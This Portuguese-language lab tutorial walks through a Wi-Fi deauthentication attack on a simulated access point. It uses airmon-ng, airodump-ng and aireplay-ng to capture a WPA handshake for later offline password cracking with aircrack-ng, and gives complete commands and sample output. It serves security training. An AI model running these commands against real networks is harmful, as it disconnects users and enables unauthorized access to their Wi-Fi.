Introdução
Bem-vindo a este laboratório sobre como forçar a captura de um handshake WPA. O handshake de quatro vias WPA/WPA2 é um dado crítico necessário para tentar quebrar a senha de uma rede Wi-Fi. Embora você possa esperar passivamente que um dispositivo se conecte à rede para capturar este handshake, isso pode consumir muito tempo.
Uma abordagem mais ativa é forçar um cliente atualmente conectado a desconectar e, em seguida, reconectar imediatamente. Este processo é chamado de ataque de desautenticação (ou "deauth"). Quando o cliente se reconecta, ele executa o handshake de quatro vias, que você pode então capturar.
Neste laboratório, você usará o aireplay-ng, uma ferramenta poderosa do conjunto aircrack-ng, para realizar um ataque de desautenticação contra um cliente Wi-Fi simulado. Isso permitirá que você capture de forma confiável o handshake WPA para análise. Nosso ambiente de laboratório foi pré-configurado com um ponto de acesso sem fio (AP) virtual chamado MyTestAP e um cliente conectado.
Identificar um Cliente Associado de uma Varredura airodump-ng
Nesta etapa, você preparará sua interface sem fio para monitoramento e, em seguida, usará o airodump-ng para encontrar o ponto de acesso alvo e seu cliente conectado.
Primeiro, você precisa colocar uma de suas interfaces sem fio virtuais em modo de monitoramento. Este modo permite que a interface capture todo o tráfego Wi-Fi no ar, não apenas o tráfego destinado a ela. Usaremos a interface wlan1.
Execute o seguinte comando para iniciar o modo de monitoramento na wlan1:
sudo airmon-ng start wlan1
Este comando criará uma nova interface de monitoramento, tipicamente chamada wlan1mon. Você deverá ver uma saída confirmando que o modo foi ativado.
PHY Interface Driver Chipset
phy0 wlan0 mac80211_hwsim Software simulator
phy1 wlan1 mac80211_hwsim Software simulator
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
(mac80211 station mode vif disabled for [phy1]wlan1)
Agora, execute o airodump-ng na nova interface de monitoramento (wlan1mon) para iniciar a varredura. Usaremos o flag -w para gravar os pacotes capturados em um arquivo chamado capture, e especificaremos o BSSID e o canal do nosso AP alvo para focar a varredura. O BSSID para o nosso AP simulado é 02:00:00:00:01:00 e ele está no canal 6.
sudo airodump-ng -w capture --bssid 02:00:00:00:01:00 -c 6 wlan1mon
Deixe o airodump-ng rodar. Você verá uma tela que se atualiza em tempo real. A parte superior lista os pontos de acesso próximos, e a parte inferior lista os clientes conectados a eles. Você deverá ver o nosso AP, MyTestAP, e um cliente conectado a ele.
A saída será semelhante a esta:
CH 6 ][ Elapsed: 10 s ][ 2023-10-27 10:30
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:01:00 -30 10 5 0 6 540 WPA2 CCMP PSK MyTestAP
BSSID STATION PWR Rate Lost Frames Probe
02:00:00:00:01:00 02:00:00:00:02:00 -35 0- 1 0 5
A partir desta saída, identifique e anote:
- BSSID:
02:00:00:00:01:00(O endereço MAC do AP). - STATION:
02:00:00:00:02:00(O endereço MAC do cliente conectado).
Mantenha este terminal em execução. Você precisará dele para confirmar a captura do handshake mais tarde.
Abrir um Novo Terminal para o Ataque de Desautenticação
Nesta etapa, você abrirá uma nova janela de terminal. O comando airodump-ng da etapa anterior deve continuar em execução no primeiro terminal para escutar o handshake WPA. O ataque de desautenticação será lançado a partir de um segundo terminal separado.
Para abrir um novo terminal, clique no ícone + na barra de guias do terminal na parte superior da janela do terminal.

Assim que o novo terminal for aberto, você estará no diretório ~/project, pronto para executar o comando de ataque na próxima etapa. Todos os comandos subsequentes para o próprio ataque devem ser executados neste novo terminal.
Construir o Comando aireplay-ng Deauth com --deauth
Nesta etapa, você construirá o comando aireplay-ng que realizará o ataque de desautenticação. Você usará as informações coletadas na Etapa 1.
A sintaxe básica para um ataque de desautenticação com aireplay-ng é:
aireplay-ng --deauth <número_de_pacotes> -a <BSSID_AP> -c <STATION_Cliente> <interface>
Vamos detalhar os componentes:
--deauth: Esta flag especifica o modo de ataque de desautenticação.<número_de_pacotes>: Este é o número de pacotes de desautenticação a serem enviados. Enviar um pequeno pacote, como5, geralmente é suficiente para desconectar o cliente.-a <BSSID_AP>: Isso especifica o endereço MAC do Ponto de Acesso alvo. Da Etapa 1, este é02:00:00:00:01:00.-c <STATION_Cliente>: Isso especifica o endereço MAC do cliente que você deseja desconectar. Da Etapa 1, este é02:00:00:00:02:00.<interface>: Esta é a sua interface sem fio em modo de monitoramento, que éwlan1mon.
Agora, monte o comando completo em seu novo terminal. Ele deve parecer exatamente com isto:
sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon
Não pressione Enter ainda. Na próxima etapa, você executará este comando.
Executar o Ataque Direcionado ao Cliente e AP
Nesta etapa, você executará o comando que acabou de construir para lançar o ataque.
Na sua segunda janela de terminal, pressione Enter para executar o comando aireplay-ng.
sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon
A ferramenta começará imediatamente a enviar pacotes de desautenticação. A saída mostrará o tempo e que está enviando desautenticações direcionadas ao cliente.
A saída será semelhante a esta:
10:35:10 Waiting for beacon frame (BSSID: 02:00:00:00:01:00) on channel 6
10:35:10 Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
10:35:11 Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
...
O ataque é muito rápido. Assim que você executar o comando, o cliente alvo será desconectado da rede e tentará reconectar imediatamente. Este processo de reconexão é o que gera o handshake WPA que queremos capturar.
Mude rapidamente de volta para o seu primeiro terminal (aquele que está executando o airodump-ng) para observar o resultado na próxima etapa.
Confirmar Captura do Handshake na Janela do airodump-ng
Nesta etapa, você confirmará que o ataque de desautenticação foi bem-sucedido verificando a mensagem de handshake WPA na sua janela do airodump-ng.
Volte para o seu primeiro terminal. Se o ataque funcionou, você verá uma nova mensagem no canto superior direito da exibição do airodump-ng:
WPA handshake: 02:00:00:00:01:00
Esta mensagem confirma que o airodump-ng interceptou e gravou com sucesso o handshake de quatro vias para o BSSID especificado.
CH 6 ][ Elapsed: 45 s ][ 2023-10-27 10:35 ][ WPA handshake: 02:00:00:00:01:00
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:01:00 -30 48 82 1 6 540 WPA2 CCMP PSK MyTestAP
BSSID STATION PWR Rate Lost Frames Probe
02:00:00:00:01:00 02:00:00:00:02:00 -36 0- 1 0 75
Agora que você tem o handshake, pode parar a captura. Pressione Ctrl+C no terminal do airodump-ng para pará-lo.
Como você usou a flag -w capture na Etapa 1, o airodump-ng salvou o tráfego capturado em arquivos no seu diretório atual (~/project). Liste os arquivos para ver os resultados.
ls -l
Você deverá ver vários arquivos começando com capture, incluindo capture-01.cap. Este arquivo .cap contém os dados brutos dos pacotes, incluindo o handshake WPA que você acabou de capturar.
-rw-r--r-- 1 root root 450 Oct 27 10:36 capture-01.cap
-rw-r--r-- 1 root root 892 Oct 27 10:36 capture-01.csv
-rw-r--r-- 1 root root 634 Oct 27 10:36 capture-01.kismet.csv
-rw-r--r-- 1 root root 128 Oct 27 10:36 capture-01.kismet.netxml
-rw-r--r-- 1 labex labex 121 Oct 27 10:28 hostapd.conf
-rw-r--r-- 1 labex labex 52 Oct 27 10:28 wpa_supplicant.conf
O arquivo capture-01.cap é o prêmio. Ele pode agora ser usado com ferramentas de quebra de senha como aircrack-ng para tentar descobrir a chave pré-compartilhada da rede.
Resumo
Parabéns por completar este laboratório! Você realizou com sucesso um ataque de desautenticação para forçar e capturar um handshake WPA.
Neste laboratório, você aprendeu a:
- Colocar uma interface sem fio em modo de monitoramento usando
airmon-ng. - Escanear e identificar um AP e cliente alvo com
airodump-ng. - Construir e executar um ataque de desautenticação usando
aireplay-ng. - Confirmar a captura do handshake WPA e localizar o arquivo
.capresultante.
Esta é uma habilidade fundamental em testes de segurança de redes sem fio. O arquivo de handshake capturado é o ingrediente chave para a próxima fase: a quebra de senha offline usando uma ferramenta como aircrack-ng e uma lista de palavras abrangente.
